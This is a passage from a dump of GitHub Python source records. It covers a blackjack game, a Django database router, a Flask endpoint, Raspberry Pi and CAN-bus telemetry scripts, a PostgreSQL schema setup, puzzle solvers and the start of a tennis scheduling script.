1\n\t\t\tresult(x,y)\n\t\telif command in 'Xx':\n\t\t\tprint(\"We await your return, Hunter.\")\n\nmenu()\n\n","repo_name":"sdaless/psychic-carnival","sub_path":"HW Batch 2/Hw3-pr1.py","file_name":"Hw3-pr1.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27736394918","text":"import os\nfrom . import appslist\nfrom django.conf import settings\n\nBASE_DIR = settings.BASE_DIR\nEZYBAAS_DATABASES = {\n 'production': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'ezybaas.prod.db'),\n },\n 'staging': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'ezybaas.staging.db'),\n },\n 'test': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'ezybaas.test.db'),\n },\n 'ezybaas': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'ezybaas.db'),\n }\n}\n\nDATABASE_APPS_MAPPING = {'contenttypes': 'default',\n 'auth': 'default',\n 'admin': 'default',\n 'sessions': 'default',\n 'messages': 'default',\n 'staticfiles': 'default',\n 'ezybaas': 'ezybaas',\n }\n\nclass EzyBaasDbRouter:\n\n def db_for_read(self, model, **hints):\n if model._meta.app_label == 'ezybaas':\n return 'ezybaas'\n return 'default'\n\n def db_for_write(self, model, **hints):\n if model._meta.app_label == 'ezybaas':\n return 'ezybaas'\n return 'default'\n\n def allow_relation(self, obj1, obj2, **hints):\n if (obj1._meta.app_label == 'ezybaas' and\n obj2._meta.app_label == 'ezybaas'):\n return True\n elif (obj1._meta.app_label != 'ezybaas' and\n obj2._meta.app_label != 'ezybaas'):\n return True\n return None\n\n def allow_migrate(self, db, app_label, model=None, **hints):\n if db == 'ezybaas':\n return app_label == 'ezybaas'\n elif app_label == 'ezybaas':\n return db == 'ezybaas'\n\n return True\n\n ","repo_name":"bhavik1st/ezybaas","sub_path":"core/ezybaas/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"52"} +{"seq_id":"70726995686","text":"import art\nimport random\nimport math\n\n# Define the values of different cards\ncards = {\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9,\n '10': 10,\n 'J': 10,\n 'Q': 10,\n 'K': 10,\n 'A': 11\n}\n\n# Function to draw a card for a player\ndef draw_card(player: list):\n card = random.choice(list(cards.keys()))\n player.append(card)\n\n# Function to calculate the total score of a list of cards\ndef calculate_score(cards_list: list):\n score = sum([cards[card] for card in cards_list])\n\n # Handling the value of Aces when score exceeds 21\n if score > 21:\n aces_to_be_one = math.ceil((score - 21) / 10)\n if cards_list.count(\"A\") >= aces_to_be_one:\n score -= aces_to_be_one * 10\n else:\n score -= cards_list.count(\"A\") * 10\n return score\n\n# Function to handle the dealer's turn\ndef dealer_turn(dealer_cards: list, player_cards: list):\n while calculate_score(dealer_cards) < 17:\n draw_card(dealer_cards)\n\n player_score = calculate_score(player_cards)\n dealer_score = calculate_score(dealer_cards)\n\n # Determine the winner or a draw based on scores\n if dealer_score > 21:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"dealer's cards: {dealer_cards}: score: {dealer_score}\")\n print(\"You win\")\n elif dealer_score > player_score:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"dealer's cards: {dealer_cards}, score: {dealer_score}\")\n print(\"You lose\")\n elif dealer_score == player_score:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"dealer's cards: {dealer_cards}, score: {dealer_score}\")\n print(\"Draw\")\n elif dealer_score < player_score:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"dealer's cards: {dealer_cards}, score: {dealer_score}\")\n print('You win')\n\n# Main game loop\ndef game():\n player_cards = random.choices(list(cards.keys()), k=2)\n dealer_cards = random.choices(list(cards.keys()), k=2)\n print(art.logo)\n\n while True:\n player_score = calculate_score(player_cards)\n\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"Computer's first card: {dealer_cards[0]}\")\n draw = input(\"Type 'y' to get another card, type 'n' to pass: \")\n\n if draw == 'y':\n draw_card(player_cards)\n print(player_cards)\n if calculate_score(player_cards) > 21:\n print(f\"Your cards: {player_cards}, current score: {player_score}\")\n print(f\"dealer's cards: {dealer_cards}, score: {calculate_score(dealer_cards)}\")\n print(\"You lose\")\n break\n else:\n continue\n elif draw == 'n':\n if calculate_score(dealer_cards) > calculate_score(player_cards):\n print(f\"Your cards: {player_cards}, current score: {calculate_score(player_cards)}\")\n print(f\"dealer's cards: {dealer_cards}, score: {calculate_score(dealer_cards)}\")\n print(\"You lose\")\n break\n elif calculate_score(dealer_cards) <= calculate_score(player_cards):\n dealer_turn(dealer_cards, player_cards)\n break\n\n# Main loop to play the game multiple times\nwhile True:\n game()\n play_again = input(\"Would you like to play again? 'y' / 'n'\\n\")\n if play_again.lower() == 'y':\n continue\n else:\n break","repo_name":"abdallah-t/blackjack-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26886516409","text":"import random\nfrom urllib import response\n\nfrom flask import Blueprint, jsonify, request\nfrom flask_restx import Namespace, Resource, fields\nfrom project.blueprints.media_album_blueprint import album_response_model\nfrom project.blueprints.media_playlist_blueprint import playlist_response_model\nfrom project.blueprints.media_song_blueprint import song_response_model\nfrom project.controllers.user_controller import UserController\nfrom project.helpers.helper_auth import check_token\nfrom project.helpers.helper_media import MediaRequester\nfrom project.helpers.helper_notification import send_notification\n\napi = Namespace(\n name=\"Media Home\", path=\"media/home\", description=\"Home related endpoints\"\n)\n\nhome_model = api.model(\n \"Home\",\n {\n \"songs\": fields.List(\n fields.Nested(song_response_model, required=False, description=\"Songs\")\n ),\n \"playlists\": fields.List(\n fields.Nested(\n playlist_response_model, required=False, description=\"Playlists\"\n )\n ),\n \"albums\": fields.List(\n fields.Nested(album_response_model, required=False, description=\"Albums\")\n ),\n },\n)\n\n\n@api.route(\"/\")\nclass Home(Resource):\n @check_token\n @api.response(200, \"Success\", home_model)\n def get(self, id):\n \"\"\"\n Returns 5 random songs, 5 random playlists and 5 random albums.\n They are based on the user's preferences (location and genres).\n \"\"\"\n data, status_code = MediaRequester.get(f\"home/{id}\", user_id=request.user.id)\n try:\n data[\"songs\"] = random.sample(data[\"songs\"], min(5, len(data[\"songs\"])))\n data[\"playlists\"] = random.sample(\n data[\"playlists\"], min(5, len(data[\"playlists\"]))\n )\n data[\"albums\"] = random.sample(data[\"albums\"], min(5, len(data[\"albums\"])))\n except KeyError:\n data = {\"songs\": [], \"playlists\": [], \"albums\": []}\n\n return data, status_code\n","repo_name":"taller2-grupo10/users-be","sub_path":"project/blueprints/media_home_blueprint.py","file_name":"media_home_blueprint.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30942110954","text":"# RPi GPIO Pin Introduction\n\n# Written by Cole Lyman\n\n# 11.18.2021\n\n# import important thangs\nimport RPi.GPIO as GPIO\n\nfrom time import sleep\n\nGPIO.setmode(GPIO.BCM)\n\n#list of LED pins\nchannel_list = [5, 12, 21]\n\nGPIO.setup(channel_list, GPIO.OUT, initial=GPIO.LOW)\n\n#function for turning on ONLY one LED\ndef solo(lis, a, b):\n\tfor i in lis:\n\t\tif i !=a:\n\t\t\tGPIO.output(i, False)\n\t\telse:\n\t\t\tGPIO.output(i, True)\n\tsleep(b)\n\n#keep running above function, switching LEDs in the list initially defined\nwhile True:\n\tfor i in channel_list:\n\t\tsolo(channel_list, i, .25)\n","repo_name":"clyman88/Engineering_4_Notebook","sub_path":"raspberry/blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20491173214","text":"N = int(input()) #N is the amount of A_i\nl=[]\ng=[]\nfor i in range(N):\n l.append(int(input()))\n \nS=int(N*(N+1)*0.5)\nb=[x for x in set(l) if l.count(x)>1]\nif len(b)==1 :\n a=b[0]+(S-sum(l))\n print(b[0],a)\nelse:\n print('Correct')\n","repo_name":"Atcoderpractice/PAST-No.1","sub_path":"D_nishino.py","file_name":"D_nishino.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37385726113","text":"x = int(input())\n\ni = 1\nwhile True:\n if i*(i-1)//2 = lowest_score:\n return True\n # Check if every amphi is in it's place. If yes - we are finished\n if is_hallway_empty(hallway):\n for i, burrow in enumerate(burrows):\n if not is_burrow_in_order(burrow, i):\n return False\n if score < lowest_score:\n lowest_score = score\n return True\n return False\n\n\nconfigurations = open('configs.txt', 'w')\n\n\ndef get_distance(amphi, position, candidate, from_hallway=False, to_hallway=False):\n multiplier = energy[amphi]\n if not to_hallway:\n over_burrow = hallway_over_burrow[candidate[0]]\n if from_hallway:\n distance_to_burrow = abs(position - over_burrow)\n else:\n distance_to_burrow = abs(\n hallway_over_burrow[position[0]] - over_burrow)\n distance_to_burrow += position[1] + 1\n return multiplier*(distance_to_burrow + (candidate[1] + 1))\n distance_to_burrow = abs(candidate - hallway_over_burrow[position[0]])\n return multiplier*(distance_to_burrow + position[1] + 1)\n\n\nreason_count = 0\nmemoized_count = 0\ndone_count = 0\n# ...D.A - impossible combination\n\n\ndef is_possible_to_move_to_hallway_position(from_burrow, position, hallway, amphi):\n if is_hallway_empty(hallway):\n return True\n dest = destinations[amphi]\n if dest > position:\n for i in range(position, dest):\n if hallway[i] != '_':\n his_destination = hallway_over_burrow[destinations[hallway[i]]]\n if his_destination < position:\n return False\n else:\n for i in range(dest, position):\n if hallway[i] != '_':\n his_destination = hallway_over_burrow[destinations[hallway[i]]]\n if his_destination > position:\n return False\n walk_from = hallway_over_burrow[from_burrow]\n for i in range(walk_from, position):\n if hallway[i] != '_':\n return False\n return True\n\n\nglobal_counter = 0\n\n\nmemoized = {}\n\n\ndef move_into_hallway_or_destination(score, position, hallway, burrows, from_hallway=False):\n global lowest_score\n to_memoize = (hallway, burrows, position)\n if score in memoized.keys() and to_memoize in memoized[score]:\n return\n # print_cave(hallway, burrows)\n if from_hallway:\n can_move, candidate = is_able_to_move_to_destination(position, burrows, hallway[position], hallway, True)\n\n if can_move:\n new_score = score + get_distance(hallway[position], position, candidate, from_hallway)\n if new_score >= lowest_score:\n return\n hallway_copy = hallway.copy()\n burrows_copy = deepcopy(burrows)\n hallway_copy[position] = '_'\n burrows_copy[candidate[0]][candidate[1]] = hallway[position]\n configurations.write(str(score) + ' ' + str(new_score))\n configurations.write('\\n')\n write_cave(configurations, burrows_copy, hallway_copy)\n if check_if_done(burrows_copy, hallway_copy, new_score):\n return\n if score != 0:\n if score in memoized.keys():\n memoized[score].append(to_memoize)\n else:\n memoized[score] = [to_memoize]\n movable_amphi = get_movable_amphi(burrows_copy, hallway_copy)\n in_burrows = movable_amphi[0]\n in_hallway = movable_amphi[1]\n for burrowed in in_burrows:\n move_into_hallway_or_destination(new_score,\n burrowed, hallway_copy, burrows_copy)\n for hallwayed in in_hallway:\n move_into_hallway_or_destination(new_score,\n hallwayed, hallway_copy, burrows_copy, True)\n else:\n # If burrow has an amphi above this one - can't move\n if position[1] != 0 and burrows[position[0]][position[1] - 1] != '_':\n return\n can_move, candidate = is_able_to_move_to_destination(\n position, burrows, burrows[position[0]][position[1]], hallway)\n if can_move:\n new_score = score + \\\n get_distance(burrows[position[0]][position[1]],\n position, candidate, from_hallway)\n if new_score >= lowest_score:\n return\n hallway_copy = hallway.copy()\n burrows_copy = deepcopy(burrows)\n burrows_copy[position[0]][position[1]] = '_'\n burrows_copy[candidate[0]][candidate[1]\n ] = burrows[position[0]][position[1]]\n configurations.write(str(score) + ' ' + str(new_score))\n configurations.write('\\n')\n write_cave(configurations, burrows_copy, hallway_copy)\n if check_if_done(burrows_copy, hallway_copy, new_score):\n return\n if score != 0:\n if score in memoized.keys():\n memoized[score].append(to_memoize)\n else:\n memoized[score] = [to_memoize]\n movable_amphi = get_movable_amphi(burrows_copy, hallway_copy)\n in_burrows = movable_amphi[0]\n in_hallway = movable_amphi[1]\n for burrowed in in_burrows:\n move_into_hallway_or_destination(new_score,\n burrowed, hallway_copy, burrows_copy)\n for hallwayed in in_hallway:\n move_into_hallway_or_destination(new_score,\n hallwayed, hallway_copy, burrows_copy, True)\n else:\n for possible in possible_positions_in_hallway:\n if hallway[possible] == '_':\n if not is_possible_to_move_to_hallway_position(position[0], possible, hallway, burrows[position[0]][position[1]]):\n continue\n hallway_copy = hallway.copy()\n hallway_copy[possible] = burrows[position[0]][position[1]]\n new_score = score + \\\n get_distance(\n hallway_copy[possible], position, possible, from_hallway, True)\n if score >= lowest_score:\n continue\n burrows_copy = deepcopy(burrows)\n burrows_copy[position[0]][position[1]] = '_'\n configurations.write(str(score) + ' ' + str(new_score))\n configurations.write('\\n')\n write_cave(configurations, burrows_copy, hallway_copy)\n if check_if_done(burrows_copy, hallway_copy, new_score):\n return\n if score != 0:\n if score in memoized.keys():\n memoized[score].append(to_memoize)\n else:\n memoized[score] = [to_memoize]\n movable_amphi = get_movable_amphi(\n burrows_copy, hallway_copy)\n in_burrows = movable_amphi[0]\n in_hallway = movable_amphi[1]\n for hallwayed in in_hallway:\n move_into_hallway_or_destination(new_score,\n hallwayed, hallway_copy, burrows_copy, True)\n for burrowed in in_burrows:\n move_into_hallway_or_destination(new_score,\n burrowed, hallway_copy, burrows_copy)\n\n\nmovable_amphi = get_movable_amphi(burrows, hallway)\nin_burrows = movable_amphi[0]\nfor burrowed in in_burrows:\n print(\"one more\")\n move_into_hallway_or_destination(0, burrowed, hallway, burrows)\n\nresult = lowest_score\n\nprint(reason_count)\nprint(memoized_count)\nprint(done_count)\nprint(\"Result: {}\".format(result))\n","repo_name":"kibartas/AOC","sub_path":"kibartas/2021/23/wip.py","file_name":"wip.py","file_ext":"py","file_size_in_byte":11840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31620714479","text":"from snapshottest.django import TestCase\n#from graphene.test import Client\nfrom django.test import Client\n\n\nclient = Client()\n\nclass APITestCase(TestCase):\n def test_api_index(self):\n \"\"\"Testing the API for /graphql/\"\"\"\n my_api_response = client.get('/graphql/')\n self.assertMatchSnapshot(my_api_response)\n","repo_name":"metakermit/hellodjangorest","sub_path":"hellodjangorest/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71460495844","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n-------------------------------------------------\r\n File Name: hadoop_model\r\n Description :\r\n Author : 潘晓华\r\n date: 2018/10/29\r\n-------------------------------------------------\r\n\"\"\"\r\n\r\n\r\nfrom cloudsdk.models import ApiModel\r\n\r\n\r\nclass ZookeeperModel(ApiModel):\r\n @classmethod\r\n def get_zookeeper_info_by_user_id(cls, user_id, zone=None):\r\n \"\"\"\r\n 获取指定用户的所有Hadoop集群\r\n :param user_id: 用户id\r\n :param zone: 区域\r\n :return: 返回Hadoop集群信息\r\n \"\"\"\r\n zookeeper_data = ApiModel.get_all(action='DescribeZookeepers', set='zookeeper_set', zone=zone,\r\n params={'owner': user_id, 'status.1': 'active', 'verbose': '1'})\r\n return zookeeper_data\r\n\r\n\r\n @classmethod\r\n def get_zookeeper(cls, zone=None):\r\n \"\"\"\r\n 获取指定区域所有Hadoop集群\r\n :param zone: 区域\r\n :return: Hadoop集群信息\r\n \"\"\"\r\n zookeeper_data = ApiModel.get_all(action='DescribeZookeepers', set='zookeeper_set', zone=zone,\r\n params={ 'status.1': 'active', 'verbose': '1'})\r\n return zookeeper_data\r\n\r\nif __name__ == '__main__':\r\n import demjson\r\n zookeeper = ZookeeperModel()\r\n print(demjson.encode(zookeeper.get_zookeeper_info_by_user_id(user_id = 'usr-jH1olhiH' ,zone='SHA')))","repo_name":"xhuaustc/cloud-sdk","sub_path":"cloudsdk/models/zookeeper_model.py","file_name":"zookeeper_model.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43650604297","text":"import numpy as np\nfrom digi.xbee.devices import XBeeDevice\nfrom digi.xbee.util import utils\nfrom digi.xbee.models.address import XBee64BitAddress\n\nimport time\nimport os\nimport can\nfrom datetime import datetime\n#Setup can0 on rpi with these parameters\nos.system('sudo ip link set can0 type can bitrate 500000')\nos.system('sudo ifconfig can0 up')\n\n\n# TODO: Replace with the serial port where your local module is connected to.\n#PORT = \"/dev/ttyUSB0\" a\nPORT = \"/dev/ttyUSB0\" \n# TODO: Replace with the baud rate of your local module. 9600 for S3B Xbee\nBAUD_RATE = 9600 \n\ntxCount = 0\nfilters = [\n {\"can_id\":0x121,\"can_mask\":0x7FF,\"extended\":False}, #1\n {\"can_id\":0x132,\"can_mask\":0x7FF,\"extended\":False}, #2\n\n # GPS?\n {\"can_id\":0x175,\"can_mask\":0x7FF,\"extended\":False},#3 \n\n\n # add \n # Coolant Temp as clt on ECU\n # decimal 1520 + 2 or 0x5F0 + 2\n # on this message:Baro, MAP, MAT, CLT\n {\"can_id\":0x5F2,\"can_mask\":0x7FF,\"extended\":False}, # 4\n\n \n # Fuel Pressure on Generic Sensor 1 \n # Bunched in 1520 + 13 or 0x5F0 + D = 0x5FD\n # +13: Sensor 1, Sens 2 (RL LINPOT), Sens 3 (RR Lin), Sens 4 (Steering Angle)\n {\"can_id\":0x5FD,\"can_mask\":0x5FF,\"extended\":False}, # 5 \n\n \n # Oil Pressure as Generic 08, \n # Bunched in 1520 + 14 or 0x5F0 + E = 0x5FE\n # +14: Sensor 5 (FR Lin), Sens 6 (FL Lin), Sens 7 \n {\"can_id\":0x5FE,\"can_mask\":0x5FF,\"extended\":False}, # 6\n\n # Oil Temp as Generic 09\n # Bunched in 1520 + 15 or 0x5F0 + F = 0x5FF\n # +15: Sensor 9, Sens 10 (accX), Sens 11 (accY), Sens 12 (accZ):\n {\"can_id\":0x5FD,\"can_mask\":0x5FF,\"extended\":False}, # 7\n\n \n \n]\ncan0 = can.interface.Bus(channel = 'can0', bustype = 'socketcan', bitrate=500000,can_filters=filters)\n\n\ndef main():\n print(\" +------------------------------------------------+\")\n print(\" | VMS Teletry System - install before flight |\")\n print(\" +------------------------------------------------+\\n\")\n device = XBeeDevice(PORT, BAUD_RATE)\n device.open()\n print(\"Found Device! Node_ID\",utils.hex_to_string(device.get_pan_id()))\n print(device.get_16bit_addr(),\" opened\")\n txCount = 0\n\n while(True):\n xbee_network = device.get_network()\n remote_device = xbee_network.discover_device(\"Coordinator\")\n print(xbee_network.get_devices())\n if( remote_device is None):\n print(\"Could not discover <>; retrying\")\n else:\n break\n \n lastTime = time.time()\n #return \n Blocking = 0;\n MAXBlock = 20;\n\n while(True):\n data = bytearray([])\n for i in range(MAXBlock):\n msg=can0.recv()\n #print(msg.arbitration_id)\n arb = msg.arbitration_id\n if(arb == 289): # 0x121\n msg.data.insert(0,1)\n '''\n t_s = datetime.fromtimestamp(msg.timestamp)\n s = [\"{0:02x}\".format(m) for m in msg.data]\n sample = ' '.join(s)\n sample = \"0x{0:02x} \".format(msg.arbitration_id) + sample + \" \" + str(msg.timestamp)\n sample = \" Frame:\" + str(txCount%MAXBlock) +\" => \" +sample\n print(\"\\t\",t_s.minute,t_s.second,t_s.microsecond,\"ID 0x{0:02x}\".format(msg.arbitration_id),sample)\n '''\n data.extend(msg.data)\n txCount = txCount + 1;\n \n elif(arb == 306): # 0x132 \n msg.data.insert(0,2)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 373): # 0x175 \n msg.data.insert(0,3)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 1522): # Coolant 0x5F2 \n msg.data.insert(0,4)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 1533): # Fuel Press 0x5FD \n msg.data.insert(0,5)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 1534): # Oil Pressure 0x5FE \n msg.data.insert(0,6)\n data.extend(msg.data)\n txCount = txCount + 1;\n elif(arb == 1535): # Oil Temp 0x5FF \n msg.data.insert(0,7)\n data.extend(msg.data)\n txCount = txCount + 1;\n\n else:\n print(\"Unknown CAN Arbitration ID:\",msg.arbitration_id)\n\n device.send_data(remote_device,data)\n\n if(txCount%100==0):\n newTime = time.time()\n print(txCount,\" messages sent. Last 100 time=>\",newTime - lastTime)\n lastTime = newTime\n\nif __name__ == '__main__':\n main()\n","repo_name":"ianre/VMS-Telemetry-V2","sub_path":"on-board-filters.py","file_name":"on-board-filters.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12245163737","text":"import psycopg2\nfrom misc import connect\n\n\nif __name__ == '__main__':\n conn = connect()\n\n commands = (\n \"\"\"DROP TABLE IF EXISTS clients CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS accounts CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS routers CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS internet_tariffs CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS tv_tariffs CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS servers CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS owned_servers CASCADE\"\"\",\n \"\"\"DROP TABLE IF EXISTS contracts CASCADE\"\"\",\n \"\"\"\n CREATE TABLE clients (\n client_id SERIAL PRIMARY KEY,\n phone_number TEXT NOT NULL,\n first_name TEXT NOT NULL,\n last_name TEXT NOT NULL,\n passport_data CHAR(10) NOT NULL,\n address TEXT NOT NULL\n )\n \"\"\",\n \"\"\" CREATE TABLE accounts (\n account_id SERIAL PRIMARY KEY,\n login TEXT NOT NULL,\n pass_hash TEXT NOT NULL,\n creation_date DATE NOT NULL,\n is_admin BOOL NOT NULL,\n client_id INTEGER,\n FOREIGN KEY (client_id)\n REFERENCES clients (client_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n )\n \"\"\",\n \"\"\"\n CREATE TABLE routers (\n router_id SERIAL PRIMARY KEY,\n price INTEGER NOT NULL,\n wifi_standard TEXT NOT NULL,\n model TEXT NOT NULL,\n frequencies TEXT NOT NULL,\n ports TEXT NOT NULL\n )\n \"\"\",\n \"\"\"\n CREATE TABLE internet_tariffs (\n tariff_id SERIAL PRIMARY KEY,\n name TEXT NOT NULL,\n speed INTEGER NOT NULL,\n price INTEGER NOT NULL\n )\n \"\"\",\n \"\"\"\n CREATE TABLE tv_tariffs (\n tariff_id SERIAL PRIMARY KEY,\n name TEXT NOT NULL,\n channels INTEGER NOT NULL,\n price INTEGER NOT NULL,\n hd_channels INTEGER NOT NULL\n )\n \"\"\",\n \"\"\"\n CREATE TABLE servers (\n server_id SERIAL PRIMARY KEY,\n price INTEGER NOT NULL,\n cpu TEXT NOT NULL,\n ram TEXT NOT NULL\n )\n \"\"\",\n \"\"\"\n CREATE TABLE owned_servers (\n o_server_id SERIAL PRIMARY KEY,\n location TEXT NOT NULL,\n server_id INTEGER NOT NULL,\n FOREIGN KEY (server_id)\n REFERENCES servers (server_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n )\n \"\"\",\n \"\"\"\n CREATE TABLE contracts (\n contract_id SERIAL PRIMARY KEY,\n date DATE NOT NULL,\n account_id INTEGER NOT NULL,\n router_id INTEGER,\n tariff_id INTEGER,\n tv_tariff_id INTEGER,\n server_id INTEGER,\n FOREIGN KEY (account_id)\n REFERENCES accounts (account_id)\n ON UPDATE CASCADE ON DELETE CASCADE,\n FOREIGN KEY (router_id)\n REFERENCES routers (router_id)\n ON UPDATE CASCADE ON DELETE CASCADE,\n FOREIGN KEY (tariff_id)\n REFERENCES internet_tariffs (tariff_id)\n ON UPDATE CASCADE ON DELETE CASCADE,\n FOREIGN KEY (tv_tariff_id)\n REFERENCES tv_tariffs (tariff_id)\n ON UPDATE CASCADE ON DELETE CASCADE,\n FOREIGN KEY (server_id)\n REFERENCES servers (server_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n )\n \"\"\"\n )\n try:\n cur = conn.cursor()\n # create table one by one\n for command in commands:\n cur.execute(command)\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n print('Created tables: Clients, Accounts, Routers, '\n 'Internet_tariffs, TV_Tariffs, Servers, Owned_servers, Contracts')\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n\n","repo_name":"antikleya/Kursach","sub_path":"DBSetup.py","file_name":"DBSetup.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30368414654","text":"\"\"\"\nThis module produces the dashboard of admin user, once they logged\n\nAuthor: Kevin Sunil\n\n\"\"\"\nimport tkinter as tk\nfrom tkinter import ttk\nimport admin\nimport utils\nimport viewWindow\nimport addWindow\nimport acceptWindow\nimport elevateWindow\nimport application\n\nclass AdminDashboard(tk.Frame):\n \"\"\"\n AdminDashboard class represents the main dashboard for the admin user.\n \n \"\"\"\n\n def __init__(self, master, db_manager, username):\n \"\"\"\n Initializes the AdminDashboard object.\n\n Args:\n master (tkinter.Tk): The root window object.\n db_manager (DatabaseManager): The database manager object.\n username (str): The username of the admin user.\n \"\"\"\n super().__init__(master)\n self.master = master\n self.db_manager = db_manager\n self.user = admin.Admin(username, db_manager)\n self.elevate = True\n if self.user.level == 5:\n self.elevate = False\n self.master.title(self.user.username)\n self.master.resizable(False, False)\n if self.elevate:\n utils.center_window(240, 250, master)\n else:\n utils.center_window(240, 350, master)\n\n # View Button\n view_button = ttk.Button(self, text=\"View\", width=20, command=self.view)\n view_button.pack(padx=20, pady=(30, 10))\n\n # Add Button\n add_button = ttk.Button(self, text=\"Add\", width=20, command=self.add)\n add_button.pack(pady=10)\n\n if self.elevate:\n # Request Elevation Button\n elevate_button = ttk.Button(self, text=\"Request Elevation\", width=20, command=self.elevate_request)\n elevate_button.pack(pady=10)\n else:\n # Lock Data Button\n lock_button = ttk.Button(self, text=\"Lock Data\", width=20, command=self.lock)\n lock_button.pack(pady=10)\n\n # Unlock Data Button\n unlock_button = ttk.Button(self, text=\"Unlock Data\", width=20, command=self.unlock)\n unlock_button.pack(pady=10)\n\n # Accept Elevation Button\n accept_button = ttk.Button(self, text=\"Accept Elevation\", width=20, command=self.accept_elevate)\n accept_button.pack(pady=10)\n\n # Logout Button\n logout_button = ttk.Button(self, text=\"Logout\", width=20, command=self.logout)\n logout_button.pack(pady=10)\n\n self.pack()\n\n def view(self):\n \"\"\"\n Callback function for the View button.\n Destroys the current window and opens the view window.\n \"\"\"\n for widget in self.winfo_children():\n widget.destroy()\n self.destroy()\n viewWindow.ViewWindow(self.master, self.db_manager, self.user, self.user.level)\n\n def add(self):\n \"\"\"\n Callback function for the Add button.\n Destroys the current window and opens the add window.\n \"\"\"\n for widget in self.winfo_children():\n widget.destroy()\n self.destroy()\n addWindow.AddWindow(self.master, self.db_manager, self.user)\n\n def elevate_request(self):\n \"\"\"\n Callback function for the Request Elevation button.\n Destroys the current window and opens the elevate window.\n \"\"\"\n for widget in self.winfo_children():\n widget.destroy()\n self.destroy()\n elevateWindow.ElevateWindow(self.master, self.db_manager, self.user)\n\n def lock(self):\n \"\"\"\n Sets the lock status of the user in the database to 1 (locked).\n \"\"\"\n self.db_manager.set_lock(self.user.username, 1)\n\n def unlock(self):\n \"\"\"\n Sets the lock status of the user in the database to 0 (unlocked).\n \"\"\"\n self.db_manager.set_lock(self.user.username, 0)\n\n def accept_elevate(self):\n \"\"\"\n Callback function for the Accept Elevation button.\n Destroys the current window and opens the accept elevation window.\n \"\"\"\n for widget in self.winfo_children():\n widget.destroy()\n self.destroy()\n acceptWindow.AcceptWindow(self.master, self.db_manager, self.user)\n\n def logout(self):\n \"\"\"\n Callback function for the Logout button.\n Destroys the current window and opens the application window.\n \"\"\"\n for widget in self.winfo_children():\n widget.destroy()\n self.destroy()\n application.Application(self.master, self.db_manager)","repo_name":"k3v1n12/patcare","sub_path":"adminDashboard.py","file_name":"adminDashboard.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18503045152","text":"#!/usr/bin/env python3\nimport argparse\nfrom datetime import datetime\nfrom io import FileIO\nimport json\nimport math\nfrom operator import mod\nimport random\nfrom ortools.sat.python import cp_model\n\n\"\"\"\n\nScheduling of friendly games for players sharing tennis courts (double games).\n\nInput:\n number of tennis courts available\n number of players available (some players might sit on bench on some games )\n number of rounds (turn) to be played\n file containing set of players on bench on each round (outputed by bench_sat.py)\n\n\"\"\"\nclass finalCourts:\n def __init__(self, fname, num_players, num_rounds, num_courts):\n self._fname = fname\n self._num_players = num_players\n self._num_rounds = num_rounds\n self._num_courts = num_courts\n self._num_players_per_court=4\n self._num_bench = num_players- (num_courts*self._num_players_per_court)\n self._all_players = range(num_players)\n self._all_rounds = range(num_rounds)\n self._all_played_courts = range(num_courts)\n self._all_courts = 